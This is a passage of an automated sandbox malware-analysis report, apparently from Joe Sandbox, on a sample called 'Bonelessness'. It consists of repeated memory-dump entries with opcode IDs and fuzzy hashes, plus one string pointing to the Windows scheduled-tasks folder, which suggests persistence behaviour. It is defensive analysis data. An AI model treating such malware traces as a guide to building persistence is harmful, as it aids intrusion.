                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403319
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                • Opcode ID: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
                                                                                                                                                                                                                • Instruction ID: 49b559ea0f9bb78937d1c0884117093763843d0ff56e3b8f35a0dc65749093db
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E60165B5A00208EBEB20DFA4DD4DB9F7B7CAB44715F0080A6EA05B2280DA749B44DF64
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: VUUU
                                                                                                                                                                                                                • API String ID: 0-2040033107
                                                                                                                                                                                                                • Opcode ID: 91a8ad65bccbbfe05e08020613915b6b43463005f411ac20db4209ee28307917
                                                                                                                                                                                                                • Instruction ID: f47a8ee1f73e22a4fe4d0782bb31250b05cbd8abf37275be656dc7776c70eb81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91a8ad65bccbbfe05e08020613915b6b43463005f411ac20db4209ee28307917
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43C13671A4065657C728CF69C9802BAFBF2BF58310F08A26EE4D2C6B81E23CF594C755
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 078465a8c5f966f900ef0431eae93261a578a5e790f795112f798ddb2a924d92
                                                                                                                                                                                                                • Instruction ID: fb4bf73fbd96ce767e3e4ced4cff5850fb0c5de91f2901caa32f86ddb58664f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 078465a8c5f966f900ef0431eae93261a578a5e790f795112f798ddb2a924d92
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC6266302083669FD711DF748998AAB7BF4EF8B342F448559E481C7322EB39C949C799
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 5036dd47c7d37404f61d9253acab986b19dacab9ed83d46aeccfe24d09195b14
                                                                                                                                                                                                                • Instruction ID: 85909a87914b4e267680ae93a060971746addf1db64755a8a3bc2181f2046f0f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5036dd47c7d37404f61d9253acab986b19dacab9ed83d46aeccfe24d09195b14
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F42E0719006499FDB24DFA8C880BEFBBF5AF4C304F14555EE446A7342D778A942CBA8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 00ffc4eb06bca0d5c3d9a2dea77500c2ca13b45209916c823031000f489548c1
                                                                                                                                                                                                                • Instruction ID: 85a937299a81f3d9309945d58e9e442e46b363752c2a3cd2ae91a7182d9b7112
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00ffc4eb06bca0d5c3d9a2dea77500c2ca13b45209916c823031000f489548c1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A120630A05B449FEB21CF18C5806AEBBF1FF46310F14859AE4A68B392C339ED46CB55
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: f797997eb54f774182d1461cf03963e7959118e080bee31629b5adcb6e64841a
                                                                                                                                                                                                                • Instruction ID: 46b84cad4234f5ce45083a22f3b7837f8dbab4e6c9ff07cf73690a7c3839c88d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f797997eb54f774182d1461cf03963e7959118e080bee31629b5adcb6e64841a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8412F4309057849FEB25CF18C490AAABBF1BF53314F15859EE8A54B391C338E946CB56
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 4287607630ae20b9aa5277460d30b0afbc744c63664bd41df3638ca158418c96
                                                                                                                                                                                                                • Instruction ID: e557182fb19255dd362c8294d5405afe168e67028f96bc1afb08ac6ffecb48eb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4287607630ae20b9aa5277460d30b0afbc744c63664bd41df3638ca158418c96
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F512D130A05B459FEF21CF18C590AAEB7F2FF55310F14856AE8A65B392C738AD42CB54
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8a1b91ede640c16b6eb738e208c258cded16843dd2e2204d56f86606c58ff67d
                                                                                                                                                                                                                • Instruction ID: 6a0df0345f276ddaee371dcc3f576922ba37433c1e1455ba353acb30c9ea1d0b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a1b91ede640c16b6eb738e208c258cded16843dd2e2204d56f86606c58ff67d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9612D534A057859FEB21CF18C58079EBBF1BF96710F14859AE8A58B381C338ED46CB65
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 873571734b46908c23de2a9ae6b9989397ee1cde3a23e753d5dfb42290629ecf
                                                                                                                                                                                                                • Instruction ID: 55551379100cdf018b1de4a285b7f8ac93436360615d4dad2d0621f8c6cf7646
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873571734b46908c23de2a9ae6b9989397ee1cde3a23e753d5dfb42290629ecf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA021430A017459FEB24CF18C580AAFB7F1FF41310F54855AE8A58B391D379AD46CBA4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 55246aaccc6255ecd0cb00e4f85a6f18806050463415470c8e688bca06ee7ecd
                                                                                                                                                                                                                • Instruction ID: cc554ed878a3e3a83374983980d7ee594483d7f74ccf43b721c7f55668250d4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55246aaccc6255ecd0cb00e4f85a6f18806050463415470c8e688bca06ee7ecd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79020630A017459FEB24CF28C5806AFB7F1FF41310F54819AE8A58B391D7B8AD86C7A5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c265ff65fe4c7ddf80da19a666888597f66043daa1ae6aea08b2ec6ac2f3f707
                                                                                                                                                                                                                • Instruction ID: 2a274e8a1ad40154ec6af4747db823c3f994c06c50863bccb78ad997ff61118a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c265ff65fe4c7ddf80da19a666888597f66043daa1ae6aea08b2ec6ac2f3f707
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC021530A017459FEB20CF18C490AAEB7F1FF41B11F18815AE8E59B391D339AE46CB94
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6df987b23289ee04ce400f9caf8f2ac37f746e7da7383059cc081eab776726bd
                                                                                                                                                                                                                • Instruction ID: e8756846642be90abbdebc3e51230c0e069d03c092d075b54a71e7ce150ad093
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6df987b23289ee04ce400f9caf8f2ac37f746e7da7383059cc081eab776726bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B702E730A057459FEB20CF18C580AAFB7F1FF91310F18855AE8A68B3A1D738AD82C755
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 51d55618cfcce28e29bf9ce08806a72b0a8a1c959ef3e02c3131e7ed5490ce38
                                                                                                                                                                                                                • Instruction ID: 2f667d1f173bafce8e1427c15ece2f47d9d4cf61a284c9476ac3f855bb14d006
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51d55618cfcce28e29bf9ce08806a72b0a8a1c959ef3e02c3131e7ed5490ce38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56F19D71A0021AABDB10CF59D984BAFB7B4FF89314F10416AED05AB382D779DD41CBA4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: bc633f8a66651507d519b18302154a8b56194e6f441ade08eecc1b0582a71b74
                                                                                                                                                                                                                • Instruction ID: 9c2bf2eb3bc8d3effd0330e87da942dcbd05d366be1e22ae6a96fd6cb05b729e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc633f8a66651507d519b18302154a8b56194e6f441ade08eecc1b0582a71b74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2123971E002198FCF08CF99C9906ADFBF2BF88314F18916AD899AB754D738A951CB54
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 42139abc3ffd798a773c451483f9a31d36512b6a1ddc4dab2380ab3743eb7a2d
                                                                                                                                                                                                                • Instruction ID: c261eb99067101d40d0f18de06a2b3948b1c8e435b3aa0119f3931cf21f67512
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42139abc3ffd798a773c451483f9a31d36512b6a1ddc4dab2380ab3743eb7a2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79E12930A057459FFB25CF28C4906AEBBE1FF92310F1481AFD5E64B391C239A856CB55
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 07a28db560a375c6abcebf6c3ee7d3ff37af9ee48000ecd15332263634e69ec2
                                                                                                                                                                                                                • Instruction ID: 3a9d95ed390408800039c1f3849d26610303243ba5ea242cbb4dce25a4e3c13c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07a28db560a375c6abcebf6c3ee7d3ff37af9ee48000ecd15332263634e69ec2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18E10430E046558FDB08CF68C5806ADBBF2EF89310F28C1AED895DB342D639DA46CB55
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d418897d6c6a607d9eedbaecd746079996b30e4215d991710b5601b1c0f57d78
                                                                                                                                                                                                                • Instruction ID: 5a37b0648728958f0288bb4f7ac6d4aba95f21994ba20fc5e025a7a006478983
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d418897d6c6a607d9eedbaecd746079996b30e4215d991710b5601b1c0f57d78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDD14772E0021A8FCB18CF99C9816EEFBB2FF98310F15912AD955AB744D734A901CF94
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8c780ae43a90426060a3544af387a16ad49e5268ea46b211455b66f1143b4994
                                                                                                                                                                                                                • Instruction ID: 9376e5c992562f3e00e2254617bc072180117d3474245450927de628b66f820d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c780ae43a90426060a3544af387a16ad49e5268ea46b211455b66f1143b4994
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D814171D01215AFDB50EFA5C841B9EB7B5AF48314F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                                • Instruction ID: 52b51f466a7fff8df6a645b0fc373324c6dabd8578bc889902f10df3be222477
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D951C433F215214BF348EA7ACC8415A73D3EBCA31075AC23AD901DB395E974E96396C4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 7903d2f27aa9249a91df88b3081f7ec253c2a7590132b0b29ce9056827596fcf
                                                                                                                                                                                                                • Instruction ID: 1e85c0a7481e4e4fd660c7700b1cffa9ef74280aecd845eca65ecbbee168b463
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7903d2f27aa9249a91df88b3081f7ec253c2a7590132b0b29ce9056827596fcf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8518C7190C3918BD311CF2AC48066BBBE1AFDA314F044E6EF8C4A7351D7799A498B96
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                                • Instruction ID: 233641ecc840252a1fc0e28f7a8495337fee8d5f73a79ec8e34192ffb94c1fa4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F41C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 677ccf3ef613ba1445ea4e47055c97133223e5db12119d95f35b79f51fc9afce
                                                                                                                                                                                                                • Instruction ID: 982f5cbd81f6543f6bfa01c041187c3b3289f829b31c426caf68f299339906e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 677ccf3ef613ba1445ea4e47055c97133223e5db12119d95f35b79f51fc9afce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D851C27150C3A28BD311CF2AC48466BBBE1AFD9314F084E6EE8D497351D378DA49CB96
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9e70f0b26bb4a857cbc1470cafd2cc077ff3004965e96456ca00bb8093ff93c1
                                                                                                                                                                                                                • Instruction ID: aa575491994ff2620d76e793d25d9d15f22605b549845f0db131f6ffb0de12b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e70f0b26bb4a857cbc1470cafd2cc077ff3004965e96456ca00bb8093ff93c1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC217C339B44BB02E7508E728C8463277E3DFCB606FAF85B6D648C7652D23DD4029124
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                                • Instruction ID: d8bd486f3b2b5881354ed63866940f8bb74c1bb7b7e3e17938e3daae00a15605
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3801C93B074E0E638519411C5024AFA11425B9279A7D4062BABCBD83D1EFCDD8D7D04F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
